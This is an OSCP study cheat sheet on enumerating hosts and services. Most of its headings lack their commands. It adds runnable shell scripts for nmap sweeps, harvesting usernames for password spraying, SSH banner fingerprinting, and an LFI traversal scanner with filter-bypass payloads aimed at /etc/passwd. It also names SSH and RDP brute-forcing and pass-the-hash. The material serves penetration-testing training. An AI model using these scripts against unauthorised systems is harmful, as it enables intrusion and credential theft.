Enumeration (Information Gathering and Enumeration)
All you need to know about basic host-based enumeration for OSCP
Network Discovery
Common Nmap Scan
-sV (Version detection)
-sT (TCP connect scan; completes the full three-way handshake, so it works without raw-socket privileges)
-sC (Script scan using the default set of NSE scripts)
-T5 (Insane timing template; fastest, but it drops probes and can miss ports on slow or filtered links)
-v (Increase verbosity level)
-A (Aggressive scan: OS detection, version detection, default scripts and traceroute; use -O for OS detection alone)
All TCP port scan
All UDP Port Scan (With Service and Script Scan)
100 most common ports
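The usual way to combine the scans above is a two-stage sweep: a fast scan of every TCP port, then -sV -sC only against the ports that came back open. The script below is an added example (not from the original notes) that automates that hand-off by parsing nmap's greppable (-oG) output; the target address, file names and the sample output are constructed for illustration.

```bash
#!/bin/sh
# Added example, not part of the original notes: a two-stage nmap workflow.
# Stage 1 sweeps all 65535 TCP ports quickly and saves greppable output (-oG);
# stage 2 parses the open ports out of that file and runs the slow
# version/script scan (-sV -sC) against only those ports.
# Target address, file names and the sample output below are constructed.

# Print the open TCP ports from "nmap -oG" output as a comma-separated list.
# Reads the file(s) given as arguments, or stdin when none are given.
# Each entry in the greppable "Ports:" field has the shape
#   port/state/protocol/owner/service/rpcinfo/version/
open_ports_from_gnmap() {
  grep 'Ports:' "$@" \
    | sed 's/.*Ports: //' \
    | tr ',' '\n' \
    | awk -F/ '$2 == "open" && $3 == "tcp" { sub(/^ +/, "", $1); print $1 }' \
    | sort -n -u \
    | tr '\n' ',' \
    | sed 's/,$//'
}

# Build the stage-2 command string for a target and a port list.
stage2_cmd() {   # stage2_cmd <target> <ports>
  printf 'nmap -sV -sC -p %s -oA nmap/targeted %s\n' "$2" "$1"
}

# Full workflow against a live target (needs nmap and network access):
#   run_workflow 10.11.1.5
run_workflow() {
  mkdir -p nmap
  # --min-rate keeps the sweep fast without -T5's packet loss; tune it to the link.
  nmap -p- --min-rate 1000 -oG nmap/all-tcp.gnmap "$1" >/dev/null
  ports="$(open_ports_from_gnmap nmap/all-tcp.gnmap)"
  [ -n "$ports" ] || { echo "no open TCP ports found" >&2; return 1; }
  nmap -sV -sC -p "$ports" -oA nmap/targeted "$1"
}

# Constructed sample of what stage 1 writes, so the parsing runs offline.
SAMPLE_GNMAP='# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -p- -oG nmap/all-tcp.gnmap 10.11.1.5
Host: 10.11.1.5 ()  Status: Up
Host: 10.11.1.5 ()  Ports: 22/open/tcp//ssh//OpenSSH 6.6.1p1 Ubuntu 2ubuntu2/, 80/open/tcp//http//Apache httpd 2.4.7/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, 445/open/tcp//netbios-ssn//Samba smbd 4.1.6/, 3306/filtered/tcp//mysql///  Ignored State: closed (65530)
# Nmap done at Mon Jan  1 00:00:10 2024 -- 1 IP address (1 host up) scanned in 10.00 seconds'

# Offline demo: the stage-2 command that would follow the sample sweep.
ports="$(printf '%s\n' "$SAMPLE_GNMAP" | open_ports_from_gnmap)"
stage2_cmd 10.11.1.5 "$ports"
```

Filtered ports are deliberately dropped from the list; if you want them probed too, change the awk condition to accept `$2 == "filtered"` as well.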
Nmap Script Scan
Find the nse scripts
For example, the command below lists the SMB scripts.
Scan using a specific NSE script
For example, the command below runs every SMB script against ports 139 and 445.
All smb scripts:
SMB share paths enumeration:
Using Metasploit portscan
Service Discovery
Port 80 & 443 - Web Discovery
Find the SSL Heartbleed vulnerability
Scan Web Servers
Dictionary Attacks for finding hidden web objects
You can also use the common web_content list.
For cgi-bin:
Or, for a faster scan:
Port 445 - SMB Discovery
To enumerate "all" SMB information at once
To enumerate the user list
You can create a username list with awk.
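Turning the enumerated users into a wordlist is the step that feeds the later brute-force and password-spray attacks. The script below is an added example (not from the original notes) of doing that with awk; the enum4linux output lines and the host are constructed for illustration.

```bash
#!/bin/sh
# Added example, not from the original notes: turn enum4linux user output into
# a wordlist for later password spraying / brute force. The sample output and
# the host name are constructed for illustration.

# Extract user names from enum4linux output. Two line shapes are handled:
#   user:[jdoe] rid:[0x450]                       (from "enumdomusers")
#   S-1-5-21-...-1104 CORP\jdoe (Local User)      (from RID cycling)
# Reads the file(s) given as arguments, or stdin when none are given.
users_from_enum4linux() {
  awk '
    /^[ \t]*user:\[/ {
      line = $0
      sub(/^[ \t]*user:\[/, "", line)   # drop the "user:[" prefix
      sub(/\].*$/, "", line)            # drop "] rid:[...]"
      print line; next
    }
    /^S-1-5-21-[0-9-]+ .*\(Local User\)[ \t]*$/ {
      name = $2
      sub(/^.*\\/, "", name)            # strip "DOMAIN\" from DOMAIN\name
      print name
    }
  ' "$@" | LC_ALL=C sort -u
}

# Constructed sample of enum4linux -U output (groups are ignored on purpose).
SAMPLE_ENUM4LINUX='[+] Getting local users via enumdomusers and RID cycling
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[jdoe] rid:[0x450]
S-1-5-21-1004336348-1177238915-682003330-1104 CORP\svc_backup (Local User)
S-1-5-21-1004336348-1177238915-682003330-513 CORP\Domain Users (Domain Group)'

# Offline demo; against a real host you would run
#   enum4linux -U 10.11.1.5 | tee enum4linux.txt
#   users_from_enum4linux enum4linux.txt > users.txt
printf '%s\n' "$SAMPLE_ENUM4LINUX" | users_from_enum4linux
```

The resulting users.txt is what you pass to hydra or crackmapexec later; keep the account lockout policy (see the password policy check below) in mind before spraying it.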
Bruteforce the share names
To find Password Policy
Alternative samba enumeration using smbmap
smbmap can also download a file directly from the target host.
smbclient: copying a whole directory
Check the list of shares via SMB null session
Connect to a specific share path you found
smbclient listing share paths with a sambaNTPassword hash (pass-the-hash)
Port 135 - RPC Discovery
Then run the following rpcclient commands for more information:
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
Port 389 (LDAP) & 636 (LDAPS) - LDAP Discovery
or using nmap
Port 21 - FTP Discovery
Port 3306 - MySQL
SQL Password Storage
Check the web application's PHP configuration files for stored database credentials.
Port 3389 - RDP
RDP to Windows
Ruby winrm package from
Bruteforce RDP
Port 21 - FTP
Port 22 - SSH
Information Gathering using nc
From the banner, the target OS is Ubuntu running OpenSSH 6.6 (Ubuntu package revision 2ubuntu2), which pins down the release.
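The script below is an added example (not from the original notes) of that banner grab and of reading the banner programmatically: it splits the SSH identification string into protocol version, software version and vendor comment, and maps a few well-known Ubuntu package revisions to the release that ships them. The target address is an assumption and the banner strings are constructed.

```bash
#!/bin/sh
# Added example, not from the original notes: grab the SSH banner with nc and
# break it into protocol version, software string and vendor comment, then map
# a few well-known Ubuntu package revisions to the release that ships them.
# The target address is an assumption; the banner strings are constructed.

# Read the first line the server sends on port 22. The server talks first, so
# nothing needs to be sent; "sleep 2" just keeps nc's stdin open long enough
# for the banner to arrive on nc variants that exit on stdin EOF.
grab_ssh_banner() {   # grab_ssh_banner <host> [port]   (needs network access)
  sleep 2 | nc -w 3 "$1" "${2:-22}" | head -n 1 | tr -d '\r'
}

# Split "SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2" into its parts
# (RFC 4253: SSH-protoversion-softwareversion SP comments).
parse_ssh_banner() {   # parse_ssh_banner <banner-line>
  banner="$1"
  case "$banner" in
    SSH-*) ;;
    *) echo "not an SSH banner: $banner" >&2; return 1 ;;
  esac
  rest="${banner#SSH-}"
  proto="${rest%%-*}"                 # 2.0
  rest="${rest#*-}"                   # OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
  software="${rest%% *}"              # OpenSSH_6.6.1p1
  comment="${rest#"$software"}"
  comment="${comment# }"              # Ubuntu-2ubuntu2 (empty when absent)
  printf 'proto=%s software=%s comment=%s\n' "$proto" "$software" "$comment"
}

# Map the Ubuntu package revision in the banner to the release that ships it.
# The pairs below are the stock openssh-server versions of each LTS release.
guess_ubuntu_release() {   # guess_ubuntu_release <banner-line>
  case "$1" in
    *"OpenSSH_6.6.1p1 Ubuntu-2ubuntu2"*) echo "14.04 (trusty)" ;;
    *"OpenSSH_7.2p2 Ubuntu-4ubuntu2"*)   echo "16.04 (xenial)" ;;
    *"OpenSSH_7.6p1 Ubuntu-4ubuntu0"*)   echo "18.04 (bionic)" ;;
    *"OpenSSH_8.2p1 Ubuntu-4ubuntu0"*)   echo "20.04 (focal)" ;;
    *"OpenSSH_8.9p1 Ubuntu-3ubuntu0"*)   echo "22.04 (jammy)" ;;
    *Ubuntu*) echo "Ubuntu (release unknown; look up the package revision)" ;;
    *) echo "unknown" ;;
  esac
}

# Offline demo with a constructed banner; on a live host use
#   b="$(grab_ssh_banner 10.11.1.5)"; parse_ssh_banner "$b"; guess_ubuntu_release "$b"
DEMO_BANNER='SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2'
parse_ssh_banner "$DEMO_BANNER"
guess_ubuntu_release "$DEMO_BANNER"
```

The vendor comment is the valuable part: the upstream OpenSSH version alone is shared across distributions, while the package revision identifies the exact release and therefore which local kernel and userland exploits are worth looking up.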
Login with SSH key
ssh-keygen
Bruteforce SSH Credential with hydra
Port 161 UDP - SNMP
To check whether the SNMP port is open
Port 88 - Kerberos
Bruteforce the username list with nmap script.
Port 1433 - MSSQL
Command Injection using nmap
Port 25 - Telnet (SMTP)
Finding known exploits from Exploit-DB
To update to latest Exploit-DB
To find an exploit
To copy the file to your current directory.
To exclude DoS entries from the results
Local File Inclusion (LFI)
Simple test of whether the target is vulnerable to LFI
Simple test of whether you can run a local script against the target
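The usual LFI test is to ask for /etc/passwd through the include parameter at increasing traversal depths and look for the root entry in the response. The script below is an added example (not from the original notes) that generates those payloads, including the null-byte and encoded-slash variants that get past naive filters, and checks responses for the marker. The target URL, parameter name and sample responses are constructed for illustration.

```bash
#!/bin/sh
# Added example, not from the original notes: generate directory-traversal
# payloads for an LFI parameter at increasing depths, fetch each with curl,
# and flag the response if it looks like /etc/passwd. The target URL, the
# parameter name and the sample responses are constructed for illustration.

# Print one candidate payload per line for depths 1..max_depth:
# plain "../", a null-byte-suffixed variant (PHP < 5.3.4 truncates the path
# at %00, which defeats an appended ".php"), and a URL-encoded-slash variant
# for filters that strip the literal "../" sequence.
lfi_payloads() {   # lfi_payloads <max_depth> [target_file]
  max="$1"; file="${2:-etc/passwd}"
  i=1; prefix=""
  while [ "$i" -le "$max" ]; do
    prefix="${prefix}../"
    printf '%s%s\n'     "$prefix" "$file"
    printf '%s%s%%00\n' "$prefix" "$file"
    printf '%s%s\n'     "$(printf '%s' "$prefix" | sed 's#/#%2f#g')" "$file"
    i=$((i + 1))
  done
}

# Return 0 when a response body contains the root entry of /etc/passwd.
lfi_hit() {   # lfi_hit <body>
  printf '%s\n' "$1" | grep -Eq '^root:[^:]*:0:0:'
}

# Try every payload as "<base_url>?<param>=<payload>" and print the hits.
# Needs network access; e.g.  lfi_scan 'http://10.11.1.5/index.php' page 6
lfi_scan() {   # lfi_scan <base_url> <param> <max_depth>
  lfi_payloads "$3" | while read -r p; do
    body="$(curl -s --max-time 5 "$1?$2=$p")"
    if lfi_hit "$body"; then
      echo "HIT: $1?$2=$p"
    fi
  done
}

# Constructed responses for an offline demo.
SAMPLE_OK='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin'
SAMPLE_MISS='<html><body>Warning: include(../../etc/passwd): failed to open stream</body></html>'
lfi_hit "$SAMPLE_OK"   && echo "sample 1: looks like /etc/passwd"
lfi_hit "$SAMPLE_MISS" || echo "sample 2: no hit (but the PHP warning leaks the include path)"
```

A miss is still information: a PHP warning such as the second sample tells you the include is happening and what was appended to your input, which decides whether the null-byte variant or a different target file is the next thing to try.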